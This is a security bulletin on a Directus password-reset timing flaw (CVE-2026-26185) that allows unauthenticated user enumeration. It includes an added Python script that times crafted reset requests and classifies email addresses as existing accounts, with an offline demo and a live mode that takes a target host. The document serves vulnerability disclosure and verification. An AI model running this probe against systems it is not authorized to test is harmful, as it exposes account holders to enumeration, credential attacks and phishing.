SB20260423137 - Observable discrepancy in Directus
Published: April 23, 2026
Description
This security bulletin contains information about 1 vulnerability.
1) Observable discrepancy (CVE-ID: CVE-2026-26185)
CWE-ID: CWE-203 - Observable discrepancy
CVSSv4: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/U:Green
The vulnerability allows a remote, unauthenticated attacker to determine whether a given account identifier (the e-mail address supplied to the password reset endpoint) belongs to an existing user account, i.e. to enumerate users.
The vulnerability exists due to an observable discrepancy in the password reset endpoint when it handles a password reset request whose reset_url parameter is invalid. A remote attacker can send such crafted password reset requests for addresses of interest and measure the response times to learn whether each targeted account exists.
The response time differs by approximately 500 ms between requests for existing and non-existing users, a gap far larger than typical network jitter and therefore measurable over the Internet with a handful of samples per address.
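The check below is an added example for verifying whether an instance exhibits the discrepancy; it is not code from the bulletin or from Directus. It assumes the shape of the Directus password reset request (POST to /auth/password/request with a JSON body carrying email and reset_url) and uses a placeholder reset_url that the server is assumed to reject; the timing samples at the bottom are constructed, not measured, so the script runs offline. Only point it at systems you are authorized to test.

```python
"""Timing-oracle check for a password-reset endpoint (added example, not bulletin or Directus code)."""
import json
import statistics
import sys
import time
import urllib.error
import urllib.request

# Approximate gap reported in the bulletin, and the decision boundary derived from it.
REPORTED_GAP_MS = 500.0
THRESHOLD_MS = REPORTED_GAP_MS / 2

# Assumed endpoint shape (Directus password reset request); adjust if your deployment differs.
RESET_PATH = "/auth/password/request"
INVALID_RESET_URL = "https://not-on-the-allow-list.invalid/reset"  # assumed to be rejected by the server


def time_reset_request(base_url, email, reset_url=INVALID_RESET_URL, timeout=10.0):
    """POST one password reset request and return wall-clock time in ms.

    An HTTP error status is still a timed response: the discrepancy described in the
    bulletin occurs when the server rejects the reset_url, so errors are expected here.
    """
    body = json.dumps({"email": email, "reset_url": reset_url}).encode()
    req = urllib.request.Request(
        base_url.rstrip("/") + RESET_PATH,
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    start = time.perf_counter()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            resp.read()
    except urllib.error.HTTPError as err:
        err.read()
    return (time.perf_counter() - start) * 1000.0


def collect_samples(base_url, email, n=15):
    """Take n timings for one address; in real use interleave calls for the addresses being compared."""
    return [time_reset_request(base_url, email) for _ in range(n)]


def interquartile_range(samples_ms):
    """Spread of the middle half of the samples; used to reject noisy measurement runs."""
    q1, _, q3 = statistics.quantiles(samples_ms, n=4)
    return q3 - q1


def median_gap_ms(candidate_ms, baseline_ms):
    """Median time for the candidate address minus the median for a baseline address
    known not to exist (a random local-part at a domain you control works)."""
    return statistics.median(candidate_ms) - statistics.median(baseline_ms)


def classify(candidate_ms, baseline_ms, threshold_ms=THRESHOLD_MS):
    """Return "exists", "absent" or "inconclusive".

    Medians rather than means, so one stalled request does not decide the result.
    The bulletin does not say which side is slower, so the absolute gap is used: any
    address handled measurably differently from a non-existent one is an existing account.
    If either sample set is so noisy that its spread rivals the gap, refuse to decide.
    """
    if max(interquartile_range(candidate_ms), interquartile_range(baseline_ms)) > threshold_ms:
        return "inconclusive"
    return "exists" if abs(median_gap_ms(candidate_ms, baseline_ms)) > threshold_ms else "absent"


# Constructed timings in ms (not measurements): ~210 ms baseline, ~500 ms extra for an
# existing account, an absent account at baseline speed, and one deliberately noisy run.
SAMPLE_BASELINE_MS = [212.4, 198.7, 230.1, 205.9, 219.3, 201.2, 224.8, 209.0, 215.6, 203.3]
SAMPLE_EXISTING_MS = [718.9, 702.3, 731.5, 709.7, 725.0, 699.8, 713.2, 720.4, 706.6, 728.1]
SAMPLE_ABSENT_MS = [208.1, 221.7, 199.5, 214.2, 226.9, 203.8, 217.0, 210.4, 229.3, 206.7]
SAMPLE_NOISY_MS = [150.0, 900.2, 210.5, 640.7, 305.9, 780.3, 190.1, 520.8, 410.6, 860.4]


def demo_offline():
    """Classify the constructed samples against the constructed baseline; returns the verdicts."""
    return {
        "existing": classify(SAMPLE_EXISTING_MS, SAMPLE_BASELINE_MS),
        "absent": classify(SAMPLE_ABSENT_MS, SAMPLE_BASELINE_MS),
        "noisy": classify(SAMPLE_NOISY_MS, SAMPLE_BASELINE_MS),
    }


if __name__ == "__main__":
    if len(sys.argv) == 3:
        # Live check against your own instance: python probe.py https://directus.example.com user@example.com
        base, candidate = sys.argv[1], sys.argv[2]
        baseline = collect_samples(base, "no-such-user-8f3a1c@example.invalid")
        samples = collect_samples(base, candidate)
        print(f"median gap {median_gap_ms(samples, baseline):.1f} ms -> {classify(samples, baseline)}")
    else:
        for name, verdict in demo_offline().items():
            print(f"{name}: {verdict}")
```

The decision threshold is half the reported gap, so a run whose own jitter exceeds that is reported as inconclusive rather than guessed; after the vendor update is applied, repeating the live check should yield gaps near zero ("absent") for addresses known to exist. The defensive counterpart of this oracle is to make the endpoint's work, and its response, independent of whether the address is found.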
Remediation
Install the update from the vendor's website. Until it is applied, rate limiting on the password reset endpoint slows down enumeration but does not remove the timing discrepancy itself.